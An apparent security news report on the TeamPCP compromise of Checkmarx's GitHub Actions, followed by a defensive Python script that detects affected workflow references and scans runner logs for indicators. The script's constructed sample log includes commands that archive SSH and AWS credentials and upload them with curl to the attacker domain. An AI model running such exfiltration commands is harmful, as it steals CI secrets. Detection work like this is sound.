Two more GitHub Actions workflows operated by Checkmarx were compromised by a threat actor known as TeamPCP, who used stolen CI credentials to harvest secrets from CI runners. The affected workflows are checkmarx/ast-github-action and checkmarx/kics-github-action, both part of Checkmarx's cloud security offerings.
Cloud security company Sysdig observed a credential stealer identical to the one used in the Trivy breach. The attack unfolded about four days after the March 19, 2026 Trivy supply chain compromise, which is tracked as CVE-2026-33634 (CVSS score: 9.4).
The stealer, dubbed "TeamPCP Cloud stealer," targets SSH keys, Git credentials, and secrets for AWS, Google Cloud, Microsoft Azure, Kubernetes, Docker, .env files, databases and VPNs, plus CI/CD configurations, and exfiltrates the data to the domain checkmarx[.]zone in an encrypted archive named tpcp.tar[.]gz. The campaign also uses a fallback mechanism: if exfiltration fails, it creates a docs-tpcp repository via the victim's GITHUB_TOKEN to back up the stolen data.
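Checking your own estate for the indicators above, as an added example (not Checkmarx or Sysdig tooling): the script below flags workflow files that reference either affected action and reports whether the reference is pinned to a full commit SHA or to a mutable tag or branch, and it scans runner log output for the three indicators the article names (checkmarx[.]zone, tpcp.tar.gz, docs-tpcp). The sample workflow and log lines are constructed; the article does not say how the stealer is invoked, so the tar and curl commands in the sample log are assumptions standing in for real runner output.

```python
"""Triage helpers for the TeamPCP Checkmarx workflow compromise.

Added example, not Checkmarx or Sysdig tooling. The indicators come from the
article (checkmarx[.]zone, tpcp.tar.gz, docs-tpcp); the sample workflow and
log lines below are constructed for illustration.
"""
import re

# Actions named in the article as compromised.
AFFECTED_ACTIONS = {
    "checkmarx/ast-github-action",
    "checkmarx/kics-github-action",
}

# Indicators of compromise taken from the article. The defanged domain
# checkmarx[.]zone is matched in its live form, since that is what appears
# in runner output and egress logs.
IOC_PATTERNS = {
    "exfil_domain": re.compile(r"\bcheckmarx\.zone\b", re.I),
    "exfil_archive": re.compile(r"\btpcp\.tar\.gz\b", re.I),
    "fallback_repo": re.compile(r"\bdocs-tpcp\b", re.I),
}

# Matches a `uses:` line in a workflow and captures owner/repo and the ref.
# A small regex is used instead of a YAML parser so the script needs no
# third-party dependency (assumption: workflows use the common one-line form).
USES_RE = re.compile(
    r"""^\s*-?\s*uses:\s*["']?(?P<action>[\w.-]+/[\w.-]+)(?:/[^@\s"']+)?@(?P<ref>[^\s"'#]+)"""
)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def find_affected_uses(workflow_text):
    """Return affected-action references in a workflow, flagging mutable refs.

    A tag or branch ref (e.g. @main, @2) can be moved to point at new code; a
    full commit SHA cannot, so SHA-pinned references are reported as pinned.
    """
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        m = USES_RE.match(line)
        if not m:
            continue
        action = m.group("action")
        if action.lower() in AFFECTED_ACTIONS:
            ref = m.group("ref")
            findings.append({
                "line": lineno,
                "action": action,
                "ref": ref,
                "pinned_to_sha": bool(SHA_RE.match(ref)),
            })
    return findings


def scan_log(lines):
    """Return (line_number, indicator_name, line) for every IOC hit in runner output."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        for name, pattern in IOC_PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, name, line.rstrip()))
    return hits


# Constructed sample workflow: one mutable tag reference, one SHA-pinned reference.
SAMPLE_WORKFLOW = """\
name: scan
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: checkmarx/ast-github-action@2
      - uses: checkmarx/kics-github-action@0123456789abcdef0123456789abcdef01234567
"""

# Constructed runner log lines (assumed shape, not captured output): the archive
# being built, an upload to the exfil domain, and a GitHub API call creating
# the fallback repository.
SAMPLE_LOG = [
    "Run checkmarx/ast-github-action@2",
    "tar czf /tmp/tpcp.tar.gz /home/runner/.ssh /home/runner/.aws",
    "curl -s -X POST https://checkmarx.zone/upload -F file=@/tmp/tpcp.tar.gz",
    "curl -H 'Authorization: token ***' https://api.github.com/user/repos -d '{\"name\":\"docs-tpcp\"}'",
    "Scan completed successfully",
]

if __name__ == "__main__":
    for f in find_affected_uses(SAMPLE_WORKFLOW):
        state = "pinned to SHA" if f["pinned_to_sha"] else "MUTABLE ref"
        print(f"workflow line {f['line']}: {f['action']}@{f['ref']} ({state})")
    for lineno, name, line in scan_log(SAMPLE_LOG):
        print(f"log line {lineno}: {name}: {line}")
```

Run `find_affected_uses` over every workflow file under `.github/workflows/` and `scan_log` over downloaded job logs for runs since March 19, 2026; any hit on the exfil domain or archive name means the runner's secrets should be treated as exposed and rotated, and a `docs-tpcp` repository anywhere in the organization is a sign the fallback path fired.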